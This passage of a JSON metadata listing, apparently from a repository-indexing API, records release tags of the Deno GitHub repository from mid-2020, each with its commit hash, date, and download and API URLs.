f87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/